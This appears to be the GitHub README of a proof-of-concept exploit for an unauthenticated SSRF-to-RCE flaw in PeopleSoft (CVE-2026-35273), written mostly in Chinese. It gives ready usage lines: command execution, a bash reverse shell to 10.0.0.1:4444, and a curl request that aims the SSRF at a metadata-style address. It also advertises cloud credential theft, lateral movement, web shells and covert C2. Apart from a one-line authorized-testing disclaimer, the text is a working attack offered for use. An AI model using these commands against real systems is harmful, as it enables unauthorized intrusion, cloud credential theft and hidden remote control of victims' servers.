ekomsSavior/POC_cve_2026_35273

# POC_cve_2026_35273 通过 PeopleSoft SSRF 实现的通用未授权 RCE 免责声明： 仅用于授权的安全测试和教育目的 用法示例： ``` # 基本命令执行 python3 exploit.py -u https://any-pplsoft.com -c "whoami" # 交互式 reverse shell python3 exploit.py -u https://target.ps.com -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" --shell --lhost 10.0.0.1 --lport 4444 # 手动 SSRF 测试（如果自动化失败） curl -k -X POST https://target.com/PSIGW/HttpListeningConnector \ -H "Content-Type: application/xml" \ -d 'http://167.224.167.224/latest/meta-data/' ``` 功能特性及其重要性 ``` Auto cloud detection Works on AWS, Azure, GCP, or on‑prem without modification Multi‑stage SSRF Probes internal services for lateral movement Credential theft Steals IAM keys, Azure tokens, or GCP service accounts Multiple RCE paths SSM, RunCommand, web shells, reverse shells Stealthy C2 Uses cloud APIs, not raw sockets ```

标签：CISA项目, Python, RCE, SSRF, StruQ, 无后门, 网络信息收集, 逆向工具